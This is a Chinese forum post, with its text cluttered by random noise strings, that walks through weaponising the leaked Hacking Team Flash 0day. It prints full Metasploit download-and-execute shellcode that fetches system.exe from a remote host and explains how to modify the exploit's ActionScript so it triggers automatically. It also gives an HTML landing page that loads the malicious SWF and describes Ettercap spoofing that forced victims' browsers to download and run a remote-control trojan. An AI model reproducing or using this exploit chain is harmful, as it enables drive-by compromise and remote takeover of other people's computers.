|
7 h2 R9 Y1 [4 J ~; }* ? a. Q# x
三、flash 0day之手工代码修改制作下载者实例入侵演示 7 t: B9 b, x( l* L1 D* [; t
* n) y, H$ |* L& Z/ i# J$ `3 U5 |
利用到的工具:
* H- q; B7 ?* P: s7 d3 d
( S' e% y: m# `& ~; ?1 W' M
: @, z" \8 ^ @7 ]1 T. S Msf ( K$ q5 s" z9 v1 l% P l: [0 z
# t: J. J( g0 l! w; W5 K
0 \! _% ^& q- y, b7 O8 h Ettercap
+ v# l8 S" ~3 w5 P7 c$ w* ?' p
% c8 d, @5 z) l ?5 S3 M& B- r3 `1 U0 o& H
Adobe Flash CS6
" m. f2 ^% A& e; W+ H. a
% m( b7 F$ j& ?$ r+ a3 m& ^0 @. ~$ z. `' J& q: K
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
3 {" n+ \- z$ R8 A6 X
7 F `2 o$ z3 s7 {9 K- V/ Y; D
o3 `2 Q/ o8 m% M( ~ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options - @( Z" O" J, @( U1 p( E, k) G
i4 V& ~! U( X/ M" u( Y
" z, _& c/ W* q9 I 如图: - g( j; K, b( @; _7 u( F- j
t6 Y E7 s" M' Q' ~! ~! h3 s& e
& d" f+ L2 M) u! q( G4 u
: q3 J0 L9 M0 f" R
0 N& K: T; l: L* J+ b8 @
5 F' `! V, ?# G6 J2 |  ' r. }. y: n* w, n
7 i% a" N$ R! B0 P5 {' A' R/ w
5 x& ^# R/ O2 a; l$ u 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 5 ~5 x& |9 G+ y) M! S2 r
; ~+ ?; a- |2 f d! d& A$ R
/ ]9 H2 {4 G$ j% D! @ : {1 o! r7 t9 X; i
" G% S7 u C5 t
- b: ^' v" B) h4 c! a r: N: B/ m 
& E7 F9 e8 y* a% u- ^ P# c 9 t; f8 z# X( C' r0 ]. y
% a: M* t5 x& ~& g1 V" A 然后执行generate -t dword生成shellcode,如下: & t+ `1 {$ }3 p: B0 ^
3 h* p4 x9 y5 Q, {7 r
. S4 r0 h* y' M) C
 1 t" i$ A( }$ S/ }4 h( C
, w% J+ j( T3 D7 V# N: u1 H* p7 C1 W" w
复制代码到文本下便于我们一会编辑flash exp,如下:
% u" `2 {2 Q# K5 K0 ]' ?
2 v1 `' _, H) @, _1 z2 y
1 }# c3 t( {5 O& A* C 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
$ f0 C- m0 G' D# u, b0 \/ |
- C. c* Y$ n' X' M, n8 t! U t. t
) l8 J% V) T, S 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
9 b5 q$ p4 ]# X 3 h$ u/ N, o! Z0 h5 [& ?
4 \' H$ w s5 h( k% F- k( l3 B1 ?% H- r 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ! d( `8 }6 [0 `/ {
$ t# d7 P2 V% w8 C
) j, c# P( o! A1 B- K- X2 k 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ; \- T$ k: s6 ~/ n$ I; J( A
; ^' D# F; q! V0 J! F- J
+ e9 [3 @* A: Z* m 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
x4 d* ?* \: z& P# s- [
) A/ `' \" B6 K/ X+ [! T% j- b% I {( ?
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
0 s) a8 ] g" D8 z! x5 U( J
' F8 ~1 D {6 R# H. w! l8 T
: O& z0 K$ o; N: m# R; O 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
; U r6 t5 U3 r% J a$ m; o# d
( g, p! z' G; ]3 Y# |" _2 p4 ?
* K0 h1 M+ h: Z4 I+ @& W0 m. i 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
5 z: M( [& `5 B/ r; L % \; M) i$ O; @$ E
8 E& G; ~7 X0 S 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, % p/ c1 B% P" U* [( q
+ ^ a3 K( A0 l1 y6 e
3 {1 T2 J" Z& v9 s! F/ c 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
8 I; h, p: V- t* Y- `9 l & t' B& C7 T3 f( R2 [2 S( C, e
* i- @. u1 Q6 n, @/ d! K
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 3 R+ q, P+ m5 a
3 C2 F/ G0 B0 E8 I: J" l" _) Q# U4 F2 t! \; u& s) I
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
3 H9 l. R# W8 \5 ]3 u
& ]8 V' H$ M( l" k( r
5 S1 x; G, v- K( g" ^6 u" \ 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 8 a+ u" T& R( z% ]
3 w* m% o3 z5 Q1 `% Y* U c0 S/ A, K& ], L
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 5 c1 W2 X2 p0 w* g7 t
J0 }. f- E. M2 f3 T) X: T
5 j' A0 H' S- x
/ N1 a( {9 f$ x: j; Z
! E5 R3 V q3 c2 o2 H: ~6 K0 @# @8 D O
5 Q% d6 m" U v
9 Q/ S$ T3 B: ], [0 F: j4 W7 @: S# {" V; y$ _, B" s8 o5 i+ J
下面我们来修改flash 0day exp,需要修改三个文件,分别为: ) ^% Z- }- W4 K- q
+ @1 D! `8 r. P1 j6 _
+ R, h' ^ o+ s& @
# f1 E/ x- D1 _. n/ a, o $ M0 O# \0 U* a3 H8 h9 M5 |
. Z. _2 @' O# \* P1 A, g0 s& [
先修改ShellWin32.as,部分源代码如图: 9 Q; v; R$ m% t8 k
8 P5 a6 d$ r4 w' L, {' ~4 y
' C: y- g2 v' X2 v  3 q+ i, y9 y& `7 U8 b; s4 p
) E! w) D. I4 q. O$ s5 \, S0 {9 m1 H% z
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
6 _( p; ^& u9 s1 N6 o4 W. z # Z, s0 d E) ~9 J1 m9 o; }
7 ?% [( I0 x9 N6 V  7 s m& B2 [% i- \
1 z+ C* H8 m9 ]& _$ [4 G& _
. q: B# b$ N, e: L& C* z5 g& i9 f# _ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: / {3 Y; l, c7 E2 T4 c' ? m
9 `; ^; w8 b# C l, W2 |3 j( U5 j
! \. ]4 l' U" }5 t: T6 ?) s) Y3 g2 i
: z: z5 c9 f) \' V# c7 T3 @6 f" D7 P; h0 W/ r6 `) `
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ( R/ r+ \+ P! u* W8 i
. ?8 K+ y3 o/ D8 V' c8 f N+ Y. i+ J
, o. e5 _; Z6 J
. q8 h3 {3 U) X z: T
5 A& t5 X" }: o; |" @
! [- R( U& ]4 k; Y1 [ r9 J' X# o3 g9 k+ [
B4 k2 ^1 t9 x) f7 a 
' n! y Q [% k. X! G- r2 V 8 ^* q4 W* r5 r( K
" c" V7 [' c# z& S, V6 O9 ]5 c
然后点保存,下面我们来编译一下,打开
0 y4 W8 \0 b$ Q7 z( j
: k( c1 v: n1 W/ i) J3 ~% q6 S' a2 d- t) \- D2 s
exp1.fla然后点文件-发布,看看编译没错误
' v4 q$ ?, Z8 \3 l% Q g4 }7 n& M' P/ b
& j6 ]! ]. Y- P: R
$ Z) m& I5 Q# k5 f& L
c) o n6 u" A6 W4 W3 w* j0 L$ h- w, f9 K, K( S% l$ G7 Q2 c* D
5 ?* N5 l. J# d- K# Q4 y' m - C6 w8 n }% v
6 S* i+ D* m0 P
|6 b0 C2 {6 A' A
* S: m1 @; Y$ @4 c; C% L
) t- K( z8 Z5 }& H/ _0 T1 |3 R
5 J4 d( `- F1 M( n. j) r2 M2 j
4 O# _/ `; h0 {
( G6 r0 t* Q" l 然后我们把生成的
5 |8 A; G, l4 J' C+ D6 T
9 B6 x0 X5 c! Q! W! ]8 X8 O- [+ N% j0 i2 j3 t- N
exp1.swf丢到kailinux 的/var/www/html下:
% |5 n, M6 Q( F2 _! I( K2 ]
( ]1 r2 f- b# q& i8 ]) _
! N7 Y8 K7 x; n; b2 }* w" w7 a0 @; J 然后把这段代码好好编辑一下 3 b; d9 S1 t- n- G; M' e; ?
& X5 ?' q( {9 I- O3 L# n) r; `# s+ X
" ]6 s* _8 j' r8 t* u, L $ y/ C- t5 T7 h5 D7 k) z5 U
' I, W7 O3 v& V( S5 O2 |; h
' {: k+ x0 i/ H4 ~7 e- z+ n3 E, E9 v
9 ~9 \, Q2 a! J0 _. n i S$ C
4 ^& g1 V, T6 U7 K) L7 H/ I: b2 a" P2 Z
: i0 a1 l: i+ u, |
7 v( v! r- @* }8 b; r. v
/ }' l0 H+ X$ R8 |! J. J' i' R
: @9 l- d6 V+ T; F1 D1 j ; C1 }7 C$ g) C- ]/ N4 p# R- F
: `- O) Y. [1 R' m - a" G1 T5 U3 x0 Z
% a! |2 b; B8 o; S0 o
* ?, z& H8 l" h/ b; e& B* H
! `3 J, p3 V5 t& E& S2 j ) E8 T/ z# K4 @6 [2 ?
+ m* G4 s1 d3 P3 ~. o' G/ r0 W
<!DOCTYPE html> % j9 |# U! k) N$ j7 P* _
6 p& p" @: b1 S+ E$ @; L4 k" i4 E# \/ h0 m' `( [% G
<html>
- F$ ]% v. M+ Y+ K
# m* U( a1 u3 p u: |0 Y5 C* I8 M$ b* i" Z# Z; F* h& w+ C0 h
<head>
$ I2 ?! B! F7 n& F& r; d
% {2 j* K6 g, L( W* S/ {
% m6 r; S3 f9 P' N9 @ K3 ^ <meta http-equiv="Content-Type" content="text/html;
, d/ S7 `$ U" M% j c4 l% t
; I% N6 S( c9 h0 C) M. ]+ Q7 V3 ?
" c8 m$ X% ?7 W charset=utf-8"/>
- m; F4 L) n, ?7 H, E M* N% _ 9 g( t/ v. o! ~' E, w% G9 Z* u( w
, x5 F9 W0 T+ z( v F* c
</head> & w: H) E* Z1 R/ M" N* U
8 }( V3 }" i- u: c2 N
n: D) q' @, T" L9 c) q9 \ <body>
% U& Z# Y% o% |4 O' y. k ]6 n $ @- T9 H& c+ ]$ G& P
7 E: y! F& S- K. S" H' D <h2> Please wait, the requested page is loading...</h2>
# ?( Q. g! _4 m4 |& M+ e- r9 c
3 J5 E6 f1 D+ s% D5 K: t4 P% L2 Z3 N |( N6 ^: W" a `" v! W
<br>
! [ k3 u6 u. P$ Y8 D% b2 z - y( d6 O, Z% u6 W/ J, Q
x( }; g" x/ q% H! r7 g
<OBJECT 1 c. Y/ f' E$ r# {( {8 b7 n+ S
; e& Q" m& y- I" g" b: v
& h, ]# }3 W# e7 N z classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie / O3 Z: m3 N( `2 Q! G; E% F
f+ [8 m. ?0 }; `! m. m% C
- \* T9 G0 r. k. J
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
. ?0 D( Z: m+ V' ]
* v7 K( ~+ T# Y8 m* s* ^$ p" W2 n. S+ o' w2 N& C- D
</body>
9 r2 d y. m* m; ^! S' q* \! p/ q- ~2 w / J$ j4 c! `% u# s/ ~/ M
8 E8 Q0 T) R; H0 ?* y6 J
<script>
3 L9 E8 e$ l1 Z$ K6 T $ [3 F" `- q0 b
6 I4 q$ e0 R8 d/ I; U% e setTimeout(function () { - ]* {, t* V8 ?% d" D
9 P! h- I( c2 F1 |9 x8 X8 ]7 C% ]1 J) ^1 e/ K
# t4 X/ o$ O+ _0 N 3 h# r: P( h$ b1 ]
& E, W7 y4 J* A w6 u9 }! d' \" { window.location.reload();
) V& G5 j5 e* V* a( o; H
, O9 F, L) z( N# t
m* B/ t* A" s$ K. \& |! W0 f }, 10000); ! K7 p+ [4 p9 S& l
4 F$ K$ M9 K, d N$ T/ @% g+ B5 ~
# q8 S( ^/ ^! U: H
( N8 k, n' _( _+ d1 o$ O
1 c* F* e: H, R C0 o5 v </script>
: X+ o9 T5 }% Z7 _7 `" W3 v2 f
/ o8 J1 W. ?6 q+ Q$ l/ W; N& I" _ E& C& v4 p; I
</html> ; d& F$ d/ [7 R% m, W6 K+ @2 n
% q/ ]: p# e. p+ N+ b: d/ Q/ O6 a1 |( r0 J% I* d1 _
! h, u. k. M2 y4 D" e# M5 q. i6 I' l
, m2 q# z a8 X2 u1 u/ A: ^9 F1 I: n5 a0 T# p' \. E* y, h
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
3 k5 X2 p, l ^8 z9 h - H$ R/ v1 u7 |" Z* S! ^0 M3 G
! K0 D5 Y6 p) }1 t3 U0 ^  1 K9 Y/ }& s- E: e4 K/ J; a7 `
@9 \: h8 m1 u. I( x
. L h" L* A) v8 J+ G+ A
& A- }& t1 W! @, t! d3 D
+ R5 K: N. x1 Y% P* D% M+ r
: p. k9 X8 h1 y6 o: |
3 m& M" \" `0 O% l' b5 e
- t# ]* I9 d& N$ ?1 G1 I7 F" S5 D) G- A& m" i0 V
, x- F/ e2 ~8 F3 t& @& g
9 y& N5 K* q# ?( _! w5 e- H
4 e( l* j5 c3 T4 k6 \( g" C
3 B2 F" g$ f6 _. [
! N7 [+ }8 n" A4 J; _: T, ]- m% N
9 c1 r# \8 Q, Y# i0 j3 b
下面我们用ettercap欺骗如图:
7 m- h/ _' [* R, W0 o6 w . x y8 n. F, R6 [1 m# E2 Z
4 k1 C& [( e0 p/ E# X. n" [4 ?9 f 
$ \6 s4 _) a& W ^! w, [3 V/ e
# \ O9 g/ T, G2 b) @- D7 ^ $ H% j, m+ `7 F0 N, u- v
1 p9 }. |. Z+ C, I: ^* H5 Y
& P/ [& E2 E' c* n! d- A. ` 下面我们随便访问个网站看看: & r9 o+ W" |* J
6 H% G( S+ H% V
; V3 O% ?8 ~. q( V/ B+ |$ G9 R t 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 6 t5 c" {! a) ]& E( H; A- P0 ~
. l* z) u5 ?. @: k. h
9 O. k, |6 ?7 R4 ^ 
8 B/ J5 |; W- S3 j5 X% c* M$ \$ W. [
+ |+ ~# U$ E4 F( I6 |% f) M
; H$ r! z! p" E 我们看另一台,
; M4 A5 R; n- y2 N3 [- K
' e& r- @+ ^$ |# \) Q, k8 j! R8 ^) M Q- v. s
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 5 d; w# }& K I2 v a' {* Z
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对